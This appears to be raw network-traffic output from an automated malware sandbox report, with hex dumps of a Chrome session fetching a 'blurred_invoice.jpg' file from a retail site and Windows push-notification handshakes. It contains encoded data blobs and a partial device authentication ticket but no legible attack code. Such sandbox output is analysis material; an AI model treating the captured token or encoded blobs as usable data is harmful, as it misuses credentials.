                      2025-01-15 00:44:06 UTC1369INData Raw: 31 59 49 4b 67 6d 45 5a 52 45 49 43 6f 50 57 58 49 4f 69 56 67 75 47 46 67 41 42 4e 67 49 6b 41 34 77 6f 42 43 41 46 6a 56 6f 48 6b 7a 4d 4d 67 58 42 62 63 30 52 78 42 39 32 32 48 52 4d 79 6f 48 4c 62 41 49 68 75 72 61 76 2f 78 53 55 79 75 5a 55 66 65 71 37 4e 63 62 52 55 5a 53 30 37 51 4c 43 37 4a 63 6e 79 53 64 41 45 2f 2f 2f 2f 2f 7a 75 53 78 52 6a 7a 2f 74 56 37 48 67 44 55 74 46 4a 72 74 62 61 32 51 4d 33 4d 41 6b 68 48 69 43 6c 48 6c 4e 72 53 4f 4d 31 56 78 48 67 79 74 48 45 4a 63 56 72 50 46 52 34 76 43 64 63 55 45 54 59 69 69 48 52 52 64 39 76 61 57 56 5a 6e 4f 56 62 70 61 36 4a 69 76 43 6e 33 30 4a 6d 7a 61 73 64 34 77 73 79 41 52 44 52 4d 58 79 6a 4b 57 54 44 4a 41 39 79 55 43 51 5a 72 4b 41 35 33 46 34 38 53 49 31 58 6d 2b 43 43 32 4f 30 62 78
                      Data Ascii: 1YIKgmEZREICoPWXIOiVguGFgABNgIkA4woBCAFjVoHkzMMgXBbc0RxB922HRMyoHLbAIhurav/xSUyuZUfeq7NcbRUZS07QLC7JcnySdAE/////zuSxRjz/tV7HgDUtFJrtba2QM3MAkhHiClHlNrSOM1VxHgytHEJcVrPFR4vCdcUETYiiHRRd9vaWVZnOVbpa6JivCn30Jmzasd4wsyARDRMXyjKWTDJA9yUCQZrKA53F48SI1Xm+CC2O0bx
                      2025-01-15 00:44:06 UTC1369INData Raw: 77 46 4a 50 75 44 59 55 46 74 4b 52 6d 31 4c 48 6b 36 7a 6f 44 2f 7a 77 4b 44 48 41 38 34 51 34 69 33 42 59 41 62 6e 70 6b 50 6c 39 33 62 63 65 2b 41 68 2b 4e 6c 65 66 37 37 70 62 4f 70 71 6e 4c 63 4e 5a 4c 31 38 74 46 37 32 76 67 2f 71 43 55 53 49 62 47 53 2f 35 74 61 55 6d 6c 31 72 65 6c 53 44 49 4f 75 45 65 61 53 6a 75 34 32 36 59 38 33 77 46 5a 2f 5a 76 53 74 2b 53 4e 37 57 33 64 4b 4c 5a 34 2f 59 35 38 73 2b 36 72 76 4f 72 6f 4e 43 77 73 4d 62 41 41 46 77 41 41 65 51 49 4a 6f 45 46 6b 59 6f 75 65 58 4b 74 56 35 37 49 35 4f 54 41 59 73 68 4c 6c 52 34 6e 66 66 64 53 30 6b 6c 4d 34 54 48 4b 35 7a 61 39 69 51 42 41 55 52 47 4a 36 6e 6c 6a 55 37 37 36 62 36 67 70 45 74 7a 31 69 43 4d 4f 44 55 4e 76 47 54 38 6c 78 55 68 43 5a 45 74 59 36 55 64 52 49 47 6f
                      Data Ascii: wFJPuDYUFtKRm1LHk6zoD/zwKDHA84Q4i3BYAbnpkPl93bce+Ah+Nlef77pbOpqnLcNZL18tF72vg/qCUSIbGS/5taUml1relSDIOuEeaSju426Y83wFZ/ZvSt+SN7W3dKLZ4/Y58s+6rvOroNCwsMbAAFwAAeQIJoEFkYoueXKtV57I5OTAYshLlR4nffdS0klM4THK5za9iQBAURGJ6nljU776b6gpEtz1iCMODUNvGT8lxUhCZEtY6UdRIGo
                      2025-01-15 00:44:06 UTC1369INData Raw: 64 6b 62 35 49 50 32 69 32 32 67 37 53 72 67 56 53 55 30 70 4d 4a 6a 6b 54 69 5a 53 56 53 47 4e 70 73 49 6b 4a 78 47 5a 48 79 64 39 67 74 56 70 64 5a 63 6c 57 4b 42 6b 59 6a 69 55 71 33 74 68 79 76 45 51 71 45 32 70 38 65 76 71 61 61 62 59 64 64 74 6c 72 50 34 63 34 31 47 46 46 61 66 58 34 47 7a 52 71 30 71 78 46 75 77 37 64 36 66 4f 48 43 79 36 74 6d 6a 46 78 30 75 52 6c 66 6b 4f 78 45 56 76 48 43 59 44 2f 6f 76 67 36 4d 65 68 6b 51 4b 6a 73 4c 42 54 69 48 5a 59 32 68 77 69 59 6c 4e 71 76 6e 5a 52 68 68 4e 50 58 35 76 59 62 42 58 71 72 4f 62 31 79 58 52 45 42 56 58 47 35 77 6b 74 67 64 74 74 76 69 61 39 59 45 66 42 4d 73 2b 71 72 35 62 4f 41 58 4f 4c 68 5a 67 71 4d 76 7a 4e 50 62 79 4d 5a 50 43 61 35 76 66 70 30 35 64 75 4c 34 38 62 66 6b 35 34 36 76 6e
                      Data Ascii: dkb5IP2i22g7SrgVSU0pMJjkTiZSVSGNpsIkJxGZHyd9gtVpdZclWKBkYjiUq3thyvEQqE2p8evqaabYddtlrP4c41GFFafX4GzRq0qxFuw7d6fOHCy6tmjFx0uRlfkOxEVvHCYD/ovg6MehkQKjsLBTiHZY2hwiYlNqvnZRhhNPX5vYbBXqrOb1yXREBVXG5wktgdttvia9YEfBMs+qr5bOAXOLhZgqMvzNPbyMZPCa5vfp05duL48bfk546vn
                      2025-01-15 00:44:06 UTC1369INData Raw: 59 2f 55 45 30 69 6c 6e 63 69 35 64 63 4e 45 6c 6c 31 31 78 31 54 58 58 33 58 4c 48 50 51 2f 71 49 36 51 6e 6e 75 55 46 58 6e 6e 54 33 36 46 39 77 4b 64 38 77 54 65 2f 2f 44 6e 35 6a 37 55 34 63 65 48 47 6f 33 6f 43 48 57 38 2b 4e 54 77 6d 55 4a 47 69 74 77 6d 35 46 37 6a 6b 2f 72 63 6f 34 6b 55 5a 7a 78 70 73 74 4f 64 57 35 41 73 6c 76 74 35 73 35 62 58 69 6a 70 61 47 33 70 63 64 68 68 48 79 67 52 45 66 4e 42 68 39 75 52 46 36 43 56 71 70 4b 68 76 4b 6e 79 2f 6e 57 53 50 74 77 6e 57 49 65 57 58 4d 2b 76 6c 47 52 6a 68 37 79 6d 38 4e 33 35 35 46 48 36 67 59 46 61 4e 69 74 45 2b 6a 46 34 37 79 2f 43 48 51 61 4e 64 39 30 52 6a 4d 2f 68 67 30 47 6f 31 47 4c 69 4a 68 76 6d 4c 4d 41 38 49 79 5a 2f 4d 30 38 64 38 30 42 33 76 35 2b 43 49 72 66 32 31 66 42 54 31
                      Data Ascii: Y/UE0ilnci5dcNEll11x1TXX3XLHPQ/qI6QnnuUFXnnT36F9wKd8wTe//Dn5j7U4ceHGo3oCHW8+NTwmUJGitwm5F7jk/rco4kUZzxpstOdW5Aslvt5s5bXijpaG3pcdhhHygREfNBh9uRF6CVqpKhvKny/nWSPtwnWIeWXM+vlGRjh7ym8N355FH6gYFaNitE+jF47y/CHQaNd90RjM/hg0Go1GLiJhvmLMA8IyZ/M08d80B3v5+CIrf21fBT1
                      2025-01-15 00:44:06 UTC1369INData Raw: 41 6a 48 49 63 69 68 6f 56 38 47 44 58 6a 61 51 2f 6a 4c 64 59 54 6b 65 64 34 4f 63 71 35 4d 6e 58 4a 41 57 39 4b 55 45 5a 57 6e 58 75 31 64 2b 42 44 43 54 59 33 4f 30 76 7a 59 2b 41 30 6b 41 66 4f 7a 2f 45 65 49 30 54 50 55 48 6e 58 65 6a 50 57 4b 4f 4b 6a 79 44 33 63 70 70 52 66 79 4e 77 52 56 68 6b 39 42 69 31 47 46 41 6b 44 62 78 6d 57 43 70 2f 54 37 51 38 4a 6e 76 6c 65 52 66 7a 30 55 7a 37 53 76 7a 57 44 6f 31 70 48 41 44 75 76 6a 79 66 7a 62 75 58 73 62 4f 6d 61 4e 41 51 49 4e 78 41 78 43 42 75 4f 47 45 49 62 65 79 6c 6c 74 72 59 78 41 5a 43 52 74 31 4b 32 5a 33 42 36 56 42 46 32 50 59 2f 76 55 56 77 39 63 39 63 42 58 44 2b 4c 71 51 56 6f 39 79 4b 6f 48 6f 58 72 51 71 42 37 6b 31 65 73 69 41 45 6d 43 6b 4e 79 77 46 4f 6d 75 6e 79 45 4c 52 7a 5a 49
                      Data Ascii: AjHIcihoV8GDXjaQ/jLdYTked4Ocq5MnXJAW9KUEZWnXu1d+BDCTY3O0vzY+A0kAfOz/EeI0TPUHnXejPWKOKjyD3cppRfyNwRVhk9Bi1GFAkDbxmWCp/T7Q8JnvleRfz0Uz7SvzWDo1pHADuvjyfzbuXsbOmaNAQINxAxCBuOGEIbeylltrYxAZCRt1K2Z3B6VBF2PY/vUVw9c9cBXD+LqQVo9yKoHoXrQqB7k1esiAEmCkNywFOmunyELRzZI
                      2025-01-15 00:44:06 UTC1369INData Raw: 75 37 31 67 32 43 47 7a 58 63 4a 48 61 7a 68 6c 73 46 74 77 76 75 46 4e 77 4e 33 51 76 64 6a 33 6b 51 39 7a 44 68 55 63 4c 6a 68 43 63 4a 54 34 73 38 79 33 69 65 38 53 4c 76 5a 65 52 56 31 75 75 73 4e 7a 46 76 63 39 37 6c 76 63 2f 37 6b 50 63 78 37 31 4f 78 7a 38 57 2b 4a 48 77 74 38 61 33 45 39 78 49 2f 53 76 30 73 39 61 76 55 37 7a 4a 2f 79 76 77 74 38 36 2f 67 2f 36 4d 51 71 63 47 43 38 4a 57 4e 51 4a 34 6a 30 4d 67 64 4b 50 4d 57 2f 45 6a 68 4b 6b 58 4b 67 30 4a 47 35 71 71 41 31 47 67 75 54 49 73 37 4c 4f 5a 6f 58 47 39 43 4c 31 4c 4e 36 49 48 55 48 4f 54 31 74 4b 69 4d 69 6a 56 79 43 72 2b 56 36 61 62 36 62 48 73 34 71 67 7a 69 38 48 50 76 70 2b 79 70 32 5a 64 49 77 78 32 75 6f 36 2b 4c 4f 4f 6f 4a 33 46 37 71 30 6d 35 6c 6b 57 35 69 6a 37 4e 33 31
                      Data Ascii: u71g2CGzXcJHazhlsFtwvuFNwN3Qvdj3kQ9zDhUcLjhCcJT4s8y3ie8SLvZeRV1uusNzFvc97lvc/7kPcx71Oxz8W+JHwt8a3E9xI/Sv0s9avU7zJ/yvwt86/g/6MQqcGC8JWNQJ4j0MgdKPMW/EjhKkXKg0JG5qqA1GguTIs7LOZoXG9CL1LN6IHUHOT1tKiMijVyCr+V6ab6bHs4qgzi8HPvp+yp2ZdIwx2uo6+LOOoJ3F7q0m5lkW5ij7N31
                      2025-01-15 00:44:06 UTC1369INData Raw: 4c 6b 4c 42 41 6f 54 6c 46 76 42 61 58 70 4a 6a 54 74 46 4a 32 54 6a 4e 4c 79 51 75 45 45 45 49 49 49 52 51 53 42 77 6a 4e 61 62 70 70 63 30 33 4e 4d 67 51 42 42 4d 58 52 59 70 70 68 47 49 71 6a 4f 49 71 6a 75 37 67 47 2f 66 78 66 42 35 74 78 2b 79 69 32 37 63 64 4f 4c 6e 2f 38 49 79 41 48 75 51 62 49 4c 55 4c 75 53 5a 72 6c 43 41 78 43 63 41 68 43 77 38 49 6a 49 68 45 56 6a 5a 68 59 78 4d 55 6a 49 52 46 4a 79 53 6d 70 61 55 6a 50 79 4d 7a 4b 6a 68 77 35 6b 58 65 43 50 47 41 65 78 79 64 2f 34 46 4d 30 47 46 49 7a 57 4e 45 78 43 4d 45 77 42 79 4a 4d 68 6e 41 36 4a 50 4e 44 48 69 41 68 4e 66 51 77 77 77 51 37 37 4f 46 6d 34 2f 68 77 6c 73 50 68 4a 76 62 77 46 44 46 38 4a 42 61 6d 38 47 43 41 47 59 5a 35 67 67 69 66 49 64 35 76 49 63 57 78 53 2f 65 2b 51 62
                      Data Ascii: LkLBAoTlFvBaXpJjTtFJ2TjNLyQuEEEIIIRQSBwjNabppc03NMgQBBMXRYpphGIqjOIqju7gG/fxfB5tx+yi27cdOLn/8IyAHuQbILULuSZrlCAxCcAhCw8IjIhEVjZhYxMUjIRFJySmpaUjPyMzKjhw5kXeCPGAexyd/4FM0GFIzWNExCMEwByJMhnA6JPNDHiAhNfQwwwQ77OFm4/hwlsPhJvbwFDF8JBam8GCAGYZ5ggifId5vIcWxS/e+Qb
                      2025-01-15 00:44:06 UTC1369INData Raw: 78 6d 51 39 36 31 66 6b 6e 35 59 4b 46 34 68 38 46 48 78 79 31 76 4f 68 31 6a 4d 62 45 57 77 30 55 71 33 2f 30 37 41 4c 72 4e 75 38 62 75 48 57 75 68 33 50 46 75 64 35 31 6f 69 62 62 79 63 59 6a 6a 48 34 54 42 6c 49 4e 72 52 79 7a 4a 56 56 48 65 6b 32 32 72 4f 46 5a 76 66 35 62 59 77 66 68 32 53 6c 74 57 68 69 55 4d 51 6c 74 32 33 4a 65 69 56 74 5a 30 6c 35 30 39 46 69 37 59 6f 33 4b 39 35 62 45 53 4e 35 6c 71 42 35 31 73 75 72 72 6d 50 49 75 41 34 63 46 2b 53 77 71 45 50 39 2f 4c 6a 36 73 2b 47 54 6a 75 54 4f 63 74 49 50 4e 37 6f 73 54 43 4c 46 71 72 73 72 33 2b 6a 68 63 73 65 64 44 6c 77 51 45 4e 73 6b 4c 6f 6a 4d 4a 30 65 4d 52 69 56 77 44 6e 71 37 4d 37 54 64 37 6c 37 76 33 74 37 33 6f 66 4f 31 50 38 42 4c 43 41 71 54 59 2b 64 58 66 39 61 6a 63 6a 6f
                      Data Ascii: xmQ961fkn5YKF4h8FHxy1vOh1jMbEWw0Uq3/07ALrNu8buHWuh3PFud51oibbycYjjH4TBlINrRyzJVVHek22rOFZvf5bYwfh2SltWhiUMQlt23JeiVtZ0l509Fi7Yo3K95bESN5lqB51surrmPIuA4cF+SwqEP9/Lj6s+GTjuTOctIPN7osTCLFqrsr3+jhcsedDlwQENskLojMJ0eMRiVwDnq7M7Td7l7v3t73ofO1P8BLCAqTY+dXf9ajcjo


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.64974595.154.228.1774436468C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-01-15 00:44:08 UTC635OUTGET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1
                      Host: www.continentalsports.co.uk
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      sec-ch-ua-platform: "Windows"
                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: image
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-15 00:44:08 UTC370INHTTP/1.1 200 OK
                      Server: nginx/1.10.3 (Ubuntu)
                      Date: Wed, 15 Jan 2025 00:44:08 GMT
                      Content-Type: image/jpeg
                      Content-Length: 7494
                      Last-Modified: Tue, 26 Jul 2022 21:55:08 GMT
                      Connection: close
                      ETag: "62e062bc-1d46"
                      Expires: Thu, 15 Jan 2026 00:44:08 GMT
                      Cache-Control: max-age=31536000
                      Cache-Control: public
                      X-Frame-Options: SAMEORIGIN
                      Accept-Ranges: bytes
                      2025-01-15 00:44:08 UTC7494INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff fe 00 3b 43 52 45 41 54 4f 52 3a 20 67 64 2d 6a 70 65 67 20 76 31 2e 30 20 28 75 73 69 6e 67 20 49 4a 47 20 4a 50 45 47 20 76 38 30 29 2c 20 71 75 61 6c 69 74 79 20 3d 20 38 30 0a ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c2 00 11 08 01 09 01 09 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 01 00 02 03 01 01 00 00 00 00 00 00
                      Data Ascii: JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 80C%# , #&')*)-0-(0%()(C((((((((((((((((((((((((((((((((((((((((((((((((((("


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.64975595.154.228.1774436468C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-01-15 00:44:09 UTC435OUTGET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1
                      Host: www.continentalsports.co.uk
                      Connection: keep-alive
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: */*
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: cors
                      Sec-Fetch-Dest: empty
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-15 00:44:09 UTC370INHTTP/1.1 200 OK
                      Server: nginx/1.10.3 (Ubuntu)
                      Date: Wed, 15 Jan 2025 00:44:09 GMT
                      Content-Type: image/jpeg
                      Content-Length: 7494
                      Last-Modified: Tue, 26 Jul 2022 21:55:08 GMT
                      Connection: close
                      ETag: "62e062bc-1d46"
                      Expires: Thu, 15 Jan 2026 00:44:09 GMT
                      Cache-Control: max-age=31536000
                      Cache-Control: public
                      X-Frame-Options: SAMEORIGIN
                      Accept-Ranges: bytes
                      2025-01-15 00:44:09 UTC7494INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff fe 00 3b 43 52 45 41 54 4f 52 3a 20 67 64 2d 6a 70 65 67 20 76 31 2e 30 20 28 75 73 69 6e 67 20 49 4a 47 20 4a 50 45 47 20 76 38 30 29 2c 20 71 75 61 6c 69 74 79 20 3d 20 38 30 0a ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c2 00 11 08 01 09 01 09 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 01 00 02 03 01 01 00 00 00 00 00 00
                      Data Ascii: JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 80C%# , #&')*)-0-(0%()(C((((((((((((((((((((((((((((((((((((((((((((((((((("


                      Session IDSource IPSource PortDestination IPDestination Port
                      4192.168.2.64975640.115.3.253443
                      TimestampBytes transferredDirectionData
                      2025-01-15 00:44:09 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 38 56 70 6d 70 53 69 72 70 45 69 45 35 62 63 74 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 35 31 36 64 65 35 63 66 30 66 34 39 36 36 37 0d 0a 0d 0a
                      Data Ascii: CNT 1 CON 305MS-CV: 8VpmpSirpEiE5bct.1Context: 6516de5cf0f49667
                      2025-01-15 00:44:09 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                      2025-01-15 00:44:09 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 38 56 70 6d 70 53 69 72 70 45 69 45 35 62 63 74 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 35 31 36 64 65 35 63 66 30 66 34 39 36 36 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 4c 7a 37 45 33 4a 38 72 59 47 63 6c 55 61 59 78 45 6f 37 32 73 73 67 6a 4c 45 62 47 35 37 4e 46 66 66 4b 64 32 47 55 6a 47 69 51 7a 58 70 68 4c 55 32 53 63 44 55 61 4f 32 35 41 43 44 79 67 4e 30 62 66 64 66 45 59 36 32 51 5a 6b 72 6a 42 5a 58 69 65 53 77 4c 6a 63 76 50 31 39 42 54 39 65 72 51 2b 4e 4d 4d 38 57 74 51 61 76
                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 8VpmpSirpEiE5bct.2Context: 6516de5cf0f49667<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWLz7E3J8rYGclUaYxEo72ssgjLEbG57NFffKd2GUjGiQzXphLU2ScDUaO25ACDygN0bfdfEY62QZkrjBZXieSwLjcvP19BT9erQ+NMM8WtQav
                      2025-01-15 00:44:09 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 38 56 70 6d 70 53 69 72 70 45 69 45 35 62 63 74 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 35 31 36 64 65 35 63 66 30 66 34 39 36 36 37 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: 8VpmpSirpEiE5bct.3Context: 6516de5cf0f49667<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                      2025-01-15 00:44:09 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                      Data Ascii: 202 1 CON 58
                      2025-01-15 00:44:09 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6a 50 71 6f 52 47 51 63 33 30 75 57 74 47 57 66 65 6b 4f 2f 56 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                      Data Ascii: MS-CV: jPqoRGQc30uWtGWfekO/Vw.0Payload parsing failed.


                      Session IDSource IPSource PortDestination IPDestination Port
                      5192.168.2.64983640.115.3.253443
                      TimestampBytes transferredDirectionData
                      2025-01-15 00:44:21 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 54 30 52 42 77 58 36 53 47 30 79 5a 4a 67 55 68 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 39 63 33 35 30 39 38 34 36 66 33 66 64 64 39 0d 0a 0d 0a
                      Data Ascii: CNT 1 CON 305MS-CV: T0RBwX6SG0yZJgUh.1Context: 29c3509846f3fdd9
                      2025-01-15 00:44:21 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                      2025-01-15 00:44:21 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 54 30 52 42 77 58 36 53 47 30 79 5a 4a 67 55 68 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 39 63 33 35 30 39 38 34 36 66 33 66 64 64 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 4c 7a 37 45 33 4a 38 72 59 47 63 6c 55 61 59 78 45 6f 37 32 73 73 67 6a 4c 45 62 47 35 37 4e 46 66 66 4b 64 32 47 55 6a 47 69 51 7a 58 70 68 4c 55 32 53 63 44 55 61 4f 32 35 41 43 44 79 67 4e 30 62 66 64 66 45 59 36 32 51 5a 6b 72 6a 42 5a 58 69 65 53 77 4c 6a 63 76 50 31 39 42 54 39 65 72 51 2b 4e 4d 4d 38 57 74 51 61 76
                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: T0RBwX6SG0yZJgUh.2Context: 29c3509846f3fdd9<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWLz7E3J8rYGclUaYxEo72ssgjLEbG57NFffKd2GUjGiQzXphLU2ScDUaO25ACDygN0bfdfEY62QZkrjBZXieSwLjcvP19BT9erQ+NMM8WtQav
                      2025-01-15 00:44:21 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 54 30 52 42 77 58 36 53 47 30 79 5a 4a 67 55 68 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 39 63 33 35 30 39 38 34 36 66 33 66 64 64 39 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
